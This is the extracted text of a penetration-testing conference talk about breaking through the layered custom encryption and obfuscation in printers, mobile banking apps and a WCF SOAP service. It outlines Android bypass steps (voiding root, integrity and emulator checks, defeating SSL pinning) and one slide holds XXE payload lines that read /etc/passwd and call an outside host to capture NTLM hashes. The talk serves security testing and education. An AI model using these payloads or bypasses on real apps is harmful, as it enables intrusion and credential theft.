When it comes to thick-clients, java applets, embedded devices or mobile apps - often, the idea is to forget about HTTP/S stack, plaintext POST parameters, and instead, implement a custom communication protocol. - Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode. - Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymetric encryption, for better protection. - Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection. Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography. Ideas that usually implement methods of 'security by obscurity'. Once the outer layer of obfuscation is off, very often the server backend reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solutions tests which require a bit more effort to allow tampering with data send from the client: - intercepting the traffic, bypassing NAC - decapsulating encryption and encoding layers - hooking into function calls, modifying packages - reverse-engineer proprietary protocols and encryption.
3. JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling,
DevSecOps, penetration
tests
• Poland, Spain, Australia
• banking, fintech, law, airline,
entertainment, e-commerce
• Speaker at BlackHat,
HackInTheBox, ZeroNights
Who
4. What is this all about?
HTTP
username=admin&password=abc
HTTP
username=admin&password=abc
SSL
Wireshark
6. What is this all about?
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
HTTP
username=admin&password=abc
SSL
SSL
Local HTTP proxy
Custom script
Wireshark
16. • JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1
19. In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
20. ECB encryption mode for PostScript files
Each block encrypted separately
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode
21. In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode
50. Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2
51. Attack flow – inception level 2
Threat
actor
Crown
jewels
Tamper with parameters
Bypass hardcoded
SSL pinning checks
Set the proxy
52. • Decompile APK to Smali code
• „Void” the pinning methods or
change the certificate:
• Find the interesting
methods
• Delete the code, leaving
„return-void” at the end
• Build it, sign it
Attack flow – inception level 2
53. Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
HTTP body encryption
55. Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
56. Attack flow – Android – 7 layers of inception
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
57. • Decompile APK to Smali code
• „Void” the integrity checks
Attack flow – Android – inception level 1/7
58. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• Second root check runs a minute after the first!
Attack flow – Android – inception level 2/7
59. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
Attack flow – Android – inception level 3/7
60. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
Attack flow – Android – inception level 4/7
61. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Attack flow – Android – inception level 5/7
62. Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
63. Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
The key will be 0000000000
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption
64. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7
70. Attack flow – tnSOAP
Threat
actor
Crown
jewels
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
71. • <!ENTITY xxe SYSTEM „file:///etc/passwd”>
• XXE OOB over FTP
• <!ENTITY „abc” SYSTEM „file://securing.biz:445/”>
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
72. Attack flow – tnSOAP
Threat
actor
Increased
attack
surface
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes
73. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Processes
74. Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing
75. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary
77. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary